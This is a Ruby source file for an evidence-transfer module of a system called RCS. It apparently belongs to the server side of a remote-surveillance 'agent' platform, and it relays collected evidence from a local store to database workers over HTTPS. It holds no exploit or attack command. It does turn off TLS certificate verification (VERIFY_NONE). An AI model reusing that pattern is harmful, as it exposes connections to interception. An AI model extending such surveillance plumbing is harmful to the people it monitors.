#
#  Evidence Transfer module for transferring evidence to the db
#

# from RCS::Common
require 'rcs-common/trace'
require 'rcs-common/fixnum'
require 'rcs-common/symbolize'
require 'rcs-common/path_utils'
require 'rcs-common/systemstatus'

require_release 'rcs-collector/db'
require_release 'rcs-collector/evidence_manager'

# from system
require 'singleton'
require 'thread'

module RCS
module Carrier

# Singleton that polls the local evidence store and pushes the evidence of
# every instance to its worker over HTTPS, using one thread per instance.
class EvidenceTransfer
  include Singleton
  include RCS::Tracer
  include SystemStatusMixin

  def initialize
    # instance => worker address returned by the db
    @workers = {}
    # worker address => persistent HTTP connection pool
    @http = {}
    # instance => Thread currently transferring its evidence
    @threads = {}
  end

  # Convenience entry point: runs the transfer loop on the singleton.
  def self.run
    instance.run
  end

  # Infinite polling loop. Once per second, if the db is connected, starts a
  # transfer thread for every instance that has pending evidence.
  #
  # Errors raised by one iteration are logged and the loop goes on. Only
  # StandardError is rescued, so SystemExit and signals still propagate.
  def run
    loop do
      begin
        # pass the control to other threads
        sleep 1

        # don't try to transfer if the db is down
        next unless DB.instance.connected?

        dispatch_pending
      rescue StandardError => e
        trace :error, "Evidence transfer error: #{e.message}"
      end
    end
  end

  # Number of transfer threads that are still alive.
  def threads
    # Hash#values returns a snapshot, so the count is not disturbed by
    # workers unregistering themselves in the meantime
    @threads.values.count(&:alive?)
  end

  # Fetches the stored info and the pending evidence ids of an instance.
  # When no info is stored for the instance, its repository is purged.
  #
  # Returns the pair [evidence_ids, info]; info may be nil.
  def get_evidence(instance)
    info = EvidenceManager.instance.instance_info instance
    EvidenceManager.instance.purge(instance, {force: true}) if info.nil?

    # get all the ids of the evidence for this instance
    evidence = EvidenceManager.instance.evidence_ids(instance)

    return evidence, info
  end

  # Sends one piece of evidence to the worker in charge of the instance.
  #
  # instance - instance the evidence belongs to
  # id       - id of the evidence in the local store
  # left     - number of evidence still queued (used for logging only)
  #
  # The evidence is removed from the local store whenever the worker answer
  # maps to the :delete action (see send_evidence).
  # Raises RuntimeError when the evidence is missing or no worker address is
  # available; errors raised by send_evidence are propagated.
  def transfer(instance, id, left)
    evidence = EvidenceManager.instance.get_evidence(id, instance)
    raise "evidence to be transferred is nil" if evidence.nil?

    address = get_worker_address(instance)
    raise "invalid worker address" unless address

    ret, error, action = send_evidence(address, instance, evidence)

    if ret
      trace :info, "Evidence sent to db [#{instance}] #{evidence.size.to_s_bytes} - #{left} left to send"
      StatsManager.instance.add ev_output: 1, ev_output_size: evidence.size
    else
      trace :error, "Evidence NOT sent to db [#{instance}]: #{error}"
    end

    # the action decides the deletion, whether the transfer succeeded or not
    EvidenceManager.instance.del_evidence(id, instance) if action == :delete
  end

  # Returns the worker address for the instance, asking the db the first
  # time and caching any non-nil answer afterwards.
  def get_worker_address(instance)
    @workers[instance] ||= begin
      address = DB.instance.get_worker(instance)
      trace :info, "Worker address for #{instance} is #{address}"
      address
    end
  end

  # POSTs the evidence to "/evidence/<instance>" on the worker at
  # address ("host:port"), reusing one persistent connection per address.
  #
  # Returns:
  #   [true,  "OK", :delete]             on a success response
  #   [false, "empty evidence", :delete] on a conflict response
  #   [false, <response body>]           on any other response (no action)
  # Any error raised while sending is logged and re-raised.
  def send_evidence(address, instance, evidence)
    host, port = address.split(':')

    http = @http[address] ||= PersistentHTTP.new(
      :name         => "PersistentToWorker#{address}",
      :pool_size    => 20,
      :host         => host,
      :port         => port,
      :use_ssl      => true,
      :read_timeout => 300,
      :verify_mode  => OpenSSL::SSL::VERIFY_NONE
    )

    request = Net::HTTP::Post.new("/evidence/#{instance}")
    request.body = evidence
    ret = http.request(request)

    case ret
      when Net::HTTPSuccess then return true, "OK", :delete
      when Net::HTTPConflict then return false, "empty evidence", :delete
    end

    return false, ret.body
  rescue StandardError => e
    trace :error, "Cannot send evidence to #{address}: #{e.class} #{e.message}"
    raise
  end

  private

  # Starts a transfer thread for every instance that has pending evidence
  # and is not already being processed.
  def dispatch_pending
    EvidenceManager.instance.instances.each do |instance|
      # one thread per instance: skip the ones still being processed.
      # Checking alive? (rather than mere presence) lets a finished worker
      # that is still registered be replaced instead of blocking the instance.
      worker = @threads[instance]
      next if worker && worker.alive?

      # get the info and evidence from the instance
      evidence, info = get_evidence(instance)
      next if evidence.empty? || info.nil?

      @threads[instance] = Thread.new do
        process_instance(instance, evidence, info)
      end
    end
  end

  # Body of a transfer thread: checks the agent status on the db and, when
  # the agent is active, sends all the queued evidence of the instance.
  # Always unregisters the instance from @threads when done.
  def process_instance(instance, evidence, info)
    trace :info, "Transferring evidence for: #{instance}"

    # make sure that the symbols are present
    # we are doing this hack since we are passing information taken from the store
    # and passing them as they were a session
    sess = info.symbolize
    sess[:demo] = (sess[:demo] == 1)

    # ask the database the id of the agent
    status, agent_id = DB.instance.agent_status(sess[:ident], sess[:instance], sess[:platform], sess[:demo], sess[:level])
    sess[:bid] = agent_id

    case status
      when DB::DELETED_AGENT, DB::NO_SUCH_AGENT, DB::CLOSED_AGENT
        trace :info, "[#{instance}] has status (#{status}) deleting repository"
        EvidenceManager.instance.purge(instance, {force: true})

      when DB::QUEUED_AGENT, DB::UNKNOWN_AGENT
        trace :warn, "[#{instance}] was queued, not transferring evidence"

      when DB::ACTIVE_AGENT
        raise "agent _id cannot be ZERO" if agent_id == 0

        # update the status in the db if it was offline when syncing
        DB.instance.sync_update sess, info['version'], info['user'], info['device'], info['source'], info['sync_time']

        # transfer all the evidence
        while (id = evidence.shift)
          self.transfer instance, id, evidence.count
        end
    end
  rescue SocketError, PersistentHTTP::Error => e
    change_status(:error, "Cannot reach worker")
    trace(:error, "Cannot reach worker: [#{e.class}] #{e.message}")
  rescue Exception => e
    # deliberately broad: whatever goes wrong in a worker must be logged
    # and must not prevent the cleanup below
    detail = "Error processing evidence: [#{e.class}] #{e.message}"
    change_status(:error, detail)
    trace(:error, detail)
  ensure
    trace :debug, "Job for #{instance} is over (#{@threads.keys.size}/#{Thread.list.count} working threads)"
    # job done, unregister so the instance can be scheduled again
    @threads.delete(instance)
  end
end

end # Carrier::
end # RCS::